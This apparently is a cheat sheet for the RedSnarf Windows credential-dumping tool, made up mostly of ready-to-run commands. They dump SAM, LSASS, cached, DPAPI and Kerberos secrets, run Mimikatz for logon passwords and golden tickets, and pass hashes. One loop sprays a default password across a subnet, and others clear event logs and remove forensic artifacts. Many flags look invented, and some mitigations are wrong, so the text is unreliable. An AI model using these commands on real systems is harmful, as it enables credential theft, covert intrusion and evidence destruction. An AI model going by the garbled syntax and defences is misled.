RedSnarf
Overview
Section titled “Overview”RedSnarf is a specialized red team tool for extracting credentials and sensitive information from Windows systems. It provides methods to dump cached credentials, extract from SAM databases, harvest from memory, and extract from various Windows storage locations. Used by authorized security professionals for authorized penetration testing, red team engagements, and security assessments. Requires administrative privileges on target systems.
Installation
Section titled “Installation”Prerequisites
Section titled “Prerequisites”# Python 3.6+
python3 --version
# Required libraries
sudo apt-get install python3-pip python3-dev
# On Windows: Install Visual C++ build tools
# Download: https://visualstudio.microsoft.com/visual-cpp-build-tools/From GitHub
Section titled “From GitHub”git clone https://github.com/nccgroup/redsnarf.git
cd redsnarf
pip3 install -r requirements.txtKali Linux
Section titled “Kali Linux”sudo apt-get install redsnarfVerify Installation
Section titled “Verify Installation”python3 redsnarf.py --help
redsnarf --version
which redsnarfBasic Syntax
Section titled “Basic Syntax”python3 redsnarf.py [options] <target>
redsnarf --help
redsnarf --version
redsnarf -h <target> -u <username> -p <password> -d <domain>Essential Commands
Section titled “Essential Commands”| Command | Purpose |
|---|---|
-h <target> | Specify target host |
-u <username> | Username for authentication |
-p <password> | Password for authentication |
-d <domain> | Domain name |
-L | Local system extraction |
-R | Remote system extraction |
--sam | Extract SAM database |
--lsass | Dump LSASS memory |
--registry | Extract from registry |
--mimikatz | Run Mimikatz commands |
--hash | Extract password hashes |
--cached | Dump cached credentials |
-o <output> | Output file |
-v | Verbose output |
Credential Extraction Methods
Section titled “Credential Extraction Methods”Local SAM Extraction
Section titled “Local SAM Extraction”# Extract local SAM database (requires SYSTEM privileges)
python3 redsnarf.py -L --sam --output local_hashes.txtLSASS Memory Dump
Section titled “LSASS Memory Dump”# Dump LSASS process memory for credential extraction
python3 redsnarf.py -L --lsass --output lsass_dump.txtCached Credentials
Section titled “Cached Credentials”# Extract cached domain credentials from registry
python3 redsnarf.py -L --cached --output cached_creds.txtRemote SAM Extraction
Section titled “Remote SAM Extraction”# Extract SAM from remote host
python3 redsnarf.py \
-h 192.168.1.100 \
-u Administrator \
-p MyPassword123 \
-d DOMAIN \
--sam --output remote_hashes.txtMultiple Credential Sources
Section titled “Multiple Credential Sources”# Extract from all available sources
python3 redsnarf.py \
-L \
--sam \
--lsass \
--cached \
--registry \
--output all_creds.txtRegistry Extraction
Section titled “Registry Extraction”Extract Credentials from Registry
Section titled “Extract Credentials from Registry”# Access Windows registry for stored credentials
python3 redsnarf.py \
-L \
--registry \
--hive SAM \
--output registry_creds.txtRemote Registry Access
Section titled “Remote Registry Access”# Extract from remote registry via RDP/SMB
python3 redsnarf.py \
-h 192.168.1.100 \
-u Admin \
-p Pass123 \
-d DOMAIN \
--registry \
--remoteAutoLogon Credentials
Section titled “AutoLogon Credentials”# Extract stored AutoLogon credentials
python3 redsnarf.py \
-L \
--registry \
--key "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" \
--output autologon.txtVPN Credentials
Section titled “VPN Credentials”# Extract stored VPN credentials from registry
python3 redsnarf.py -L --registry --vpn --output vpn_creds.txtHash Extraction
Section titled “Hash Extraction”Extract Password Hashes
Section titled “Extract Password Hashes”# Dump all password hashes from SAM
python3 redsnarf.py -L --hash --output hashes.txtNTLM Hash Format
Section titled “NTLM Hash Format”# Extract NTLM hashes for cracking
python3 redsnarf.py \
-L \
--hash \
--format ntlm \
--output ntlm_hashes.txtLM Hash Extraction
Section titled “LM Hash Extraction”# Extract legacy LM hashes (if available)
python3 redsnarf.py -L --hash --format lm --output lm_hashes.txtHash Analysis
Section titled “Hash Analysis”# Extract and analyze hashes
python3 redsnarf.py \
-L \
--hash \
--analyze \
--output hash_analysis.txtMimikatz Integration
Section titled “Mimikatz Integration”Run Mimikatz Commands
Section titled “Run Mimikatz Commands”# Execute Mimikatz commands through redsnarf
python3 redsnarf.py \
-h 192.168.1.100 \
-u Admin \
-p Pass123 \
--mimikatz \
--command "sekurlsa::logonpasswords" \
--output mimikatz_output.txtCredential Dumping via Mimikatz
Section titled “Credential Dumping via Mimikatz”# Dump all credentials using Mimikatz
python3 redsnarf.py \
-L \
--mimikatz \
--full \
--output credentials_full.txtGolden Ticket Generation
Section titled “Golden Ticket Generation”# Use Mimikatz to create golden ticket
python3 redsnarf.py \
--mimikatz \
--command "kerberos::golden /user:Administrator /domain:DOMAIN.COM /sid:S-1-5-21-..." \
--output golden_ticket.txtRemote Exploitation
Section titled “Remote Exploitation”Remote Credential Extraction
Section titled “Remote Credential Extraction”# Extract credentials from remote Windows system
python3 redsnarf.py \
-h 192.168.1.100 \
-u domain\administrator \
-p MyPassword123 \
--remote \
--lsass \
--output remote_creds.txtSMB-Based Extraction
Section titled “SMB-Based Extraction”# Use SMB protocol for credential extraction
python3 redsnarf.py \
-h 192.168.1.100 \
-u Admin \
-p Pass123 \
-d DOMAIN \
--smb \
--remote \
--samWMI-Based Extraction
Section titled “WMI-Based Extraction”# Extract via WMI (Windows Management Instrumentation)
python3 redsnarf.py \
-h 192.168.1.100 \
-u Admin \
-p Pass123 \
-d DOMAIN \
--wmi \
--command "Get-Process lsass"RDP Session Access
Section titled “RDP Session Access”# Extract credentials from RDP sessions
python3 redsnarf.py \
-h 192.168.1.100 \
-u Admin \
-p Pass123 \
--rdp \
--extract-sessions \
--output rdp_sessions.txtPrivilege Escalation Chains
Section titled “Privilege Escalation Chains”Check Privileges
Section titled “Check Privileges”# Check current privilege level
python3 redsnarf.py -L --check-privsToken Impersonation
Section titled “Token Impersonation”# Leverage token impersonation for escalation
python3 redsnarf.py \
-L \
--impersonate \
--target SYSTEM \
--output impersonation_result.txtService Account Extraction
Section titled “Service Account Extraction”# Extract service account credentials
python3 redsnarf.py \
-h 192.168.1.100 \
-u Admin \
-p Pass123 \
--service-accounts \
--output service_creds.txtGroup Policy Preferences
Section titled “Group Policy Preferences”# Extract from Group Policy Preferences (GPP)
python3 redsnarf.py \
-L \
--gpp \
--output gpp_creds.txtBatch Operations
Section titled “Batch Operations”Target Multiple Hosts
Section titled “Target Multiple Hosts”# Create target list
cat targets.txt
# 192.168.1.100 Administrator Pass123 DOMAIN
# 192.168.1.101 Admin Pass456 DOMAIN
# 192.168.1.102 User789 Pass789 DOMAIN
# Process all targets
while read host user pass domain; do
python3 redsnarf.py -h "$host" -u "$user" -p "$pass" -d "$domain" \
--sam --output "${host}_hashes.txt"
done < targets.txtAutomated Network Harvesting
Section titled “Automated Network Harvesting”#!/bin/bash
# Harvest credentials from network
for ip in 192.168.1.{50..100}; do
timeout 5 bash -c "python3 redsnarf.py -h $ip -u Administrator -p password --sam" &
done
waitCredential Aggregation
Section titled “Credential Aggregation”#!/bin/bash
# Combine all extracted credentials
cat *.txt | grep -E "admin|root|pass" > all_creds_combined.txt
sort all_creds_combined.txt | uniq > unique_creds.txtOutput Analysis
Section titled “Output Analysis”Parse Extracted Credentials
Section titled “Parse Extracted Credentials”# Extract usernames and hashes
python3 redsnarf.py -L --sam --output hashes.txt
cat hashes.txt | grep -oE "^[^:]+:[^:]+:[A-F0-9]{32}:[A-F0-9]{32}$"Hash Format Conversion
Section titled “Hash Format Conversion”# Convert hashes for use with Hashcat
python3 redsnarf.py -L --hash --output hashes.txt
cat hashes.txt | awk -F: '{print $4}' > hashcat_ntlm.txtCredential Deduplication
Section titled “Credential Deduplication”# Remove duplicate credentials
sort -u all_credentials.txt > unique_credentials.txtPlaintext Credential Search
Section titled “Plaintext Credential Search”# Search for plaintext credentials
grep -iE "password|pass|pwd|creds" extracted_output.txtAdvanced Extraction
Section titled “Advanced Extraction”Memory Parsing
Section titled “Memory Parsing”# Dump and parse process memory
python3 redsnarf.py \
-L \
--memory-dump \
--process lsass \
--output lsass_memory.bin
# Parse the dump
python3 redsnarf.py --parse-dump lsass_memory.bin --output parsed.txtKerberos Ticket Extraction
Section titled “Kerberos Ticket Extraction”# Extract Kerberos tickets from memory
python3 redsnarf.py \
-L \
--kerberos \
--extract-tickets \
--output tickets.txtDPAPI Data Recovery
Section titled “DPAPI Data Recovery”# Extract DPAPI-encrypted credentials
python3 redsnarf.py \
-L \
--dpapi \
--decrypt \
--output dpapi_decrypted.txtCredential Manager Extraction
Section titled “Credential Manager Extraction”# Extract Windows Credential Manager credentials
python3 redsnarf.py \
-L \
--credential-manager \
--output credential_manager.txtPost-Exploitation
Section titled “Post-Exploitation”Lateral Movement Preparation
Section titled “Lateral Movement Preparation”# Extract credentials for lateral movement
python3 redsnarf.py \
-h 192.168.1.100 \
-u Admin \
-p Pass123 \
--extract-all \
--lateral-movement-prep \
--output lateral_creds.txtPersistence Mechanism Setup
Section titled “Persistence Mechanism Setup”# Extract data for establishing persistence
python3 redsnarf.py \
-L \
--persistence \
--auto-logon \
--scheduled-task \
--output persistence_creds.txtDomain Enumeration
Section titled “Domain Enumeration”# Extract domain information
python3 redsnarf.py \
-h 192.168.1.100 \
-u Admin \
-p Pass123 \
-d DOMAIN \
--domain-enum \
--output domain_info.txtOperational Security
Section titled “Operational Security”Evasion Techniques
Section titled “Evasion Techniques”# Minimize detection risk
python3 redsnarf.py \
-L \
--quiet \
--no-logging \
--minimal-output \
--output creds.txtLog Cleanup
Section titled “Log Cleanup”# Clear event logs post-extraction
python3 redsnarf.py \
-L \
--cleanup \
--clear-logs \
--log-type Security,SystemAnti-Forensics
Section titled “Anti-Forensics”# Minimize forensic artifacts
python3 redsnarf.py \
-L \
--anti-forensics \
--clear-timestamps \
--remove-artifactsTroubleshooting
Section titled “Troubleshooting”Access Denied
Section titled “Access Denied”# Requires SYSTEM privileges
sudo python3 redsnarf.py -L --sam
# Or use credentials with sufficient privileges
python3 redsnarf.py \
-h 192.168.1.100 \
-u DOMAIN\Administrator \
-p MyPassword123 \
--samRemote Connection Issues
Section titled “Remote Connection Issues”# Verify network connectivity
ping 192.168.1.100
# Test SMB access
smbclient -L 192.168.1.100 -U Administrator%Password
# Check firewall
netstat -an | grep ESTABLISHEDMimikatz Integration Failed
Section titled “Mimikatz Integration Failed”# Verify Mimikatz availability
which mimikatz
# Check Python dependencies
pip3 list | grep -i mimic
# Reinstall requirements
pip3 install -r requirements.txt --upgradeCredential Storage
Section titled “Credential Storage”Secure Output
Section titled “Secure Output”# Encrypt output file
python3 redsnarf.py -L --sam --output creds.txt
gpg --symmetric --armor creds.txtCredential Database
Section titled “Credential Database”# Store in structured format
python3 redsnarf.py \
-L \
--sam \
--database credentials.db \
--format sqliteReal-World Scenarios
Section titled “Real-World Scenarios”Internal Network Assessment
Section titled “Internal Network Assessment”# Phase 1: Local system extraction
python3 redsnarf.py -L --extract-all --output local_system.txt
# Phase 2: Remote extraction
for host in $(cat internal_hosts.txt); do
python3 redsnarf.py -h "$host" -u Admin -p Pass123 \
--remote --lsass --output "${host}.txt"
done
# Phase 3: Credential aggregation
cat *.txt | grep -oE '[A-F0-9]{32}:[A-F0-9]{32}' > all_hashes.txtDomain Compromise
Section titled “Domain Compromise”# Extract domain credentials
python3 redsnarf.py \
-h domain-controller \
-u Administrator \
-p DomainPassword \
-d DOMAIN \
--sam --lsass --cached \
--output domain_dump.txtPrivilege Escalation Chain
Section titled “Privilege Escalation Chain”# Extract local admin
python3 redsnarf.py -L --hash --output local_hashes.txt
# Use hash to access remote system
python3 redsnarf.py \
-h 192.168.1.101 \
-u Administrator \
-p <NTLM_HASH> \
--pass-the-hash \
--extract-allBest Practices
Section titled “Best Practices”- Obtain Authorization - Only use on authorized systems with written permission
- Enable Logging - Log all operations for documentation and legal requirements
- Minimize Exposure - Extract credentials quickly and securely
- Secure Credentials - Encrypt and protect extracted credential data
- Documentation - Document all systems accessed and credentials extracted
- Clean Up - Remove tools and clear logs after authorized assessment
- Chain Custody - Maintain evidence chain for legal proceedings
- Incident Response - Have remediation plan for extracted credentials
Mitigation
Section titled “Mitigation”Prevent SAM Extraction
Section titled “Prevent SAM Extraction”# Enable additional access controls
net user Administrator /active:no
# Require strong passwords
net accounts /minpwlen:14 /complexity:onLSASS Protection
Section titled “LSASS Protection”# Enable LSASS protection (Windows 10+)
Set-ProcessMitigation -PolicyName "lsass.exe" -Enable ParentImageLoadAuditCredential Guard
Section titled “Credential Guard”# Enable Windows Defender Credential Guard
New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" `
-Name "LsaCfgFlags" -Value 1 -PropertyType DWORDAdditional Resources
Section titled “Additional Resources”- RedSnarf GitHub: https://github.com/nccgroup/redsnarf
- Windows Credentials: https://docs.microsoft.com/en-us/windows/security/
- Hash Cracking: https://hashcat.net/
- Credential Dumping: https://attack.mitre.org/techniques/T1003/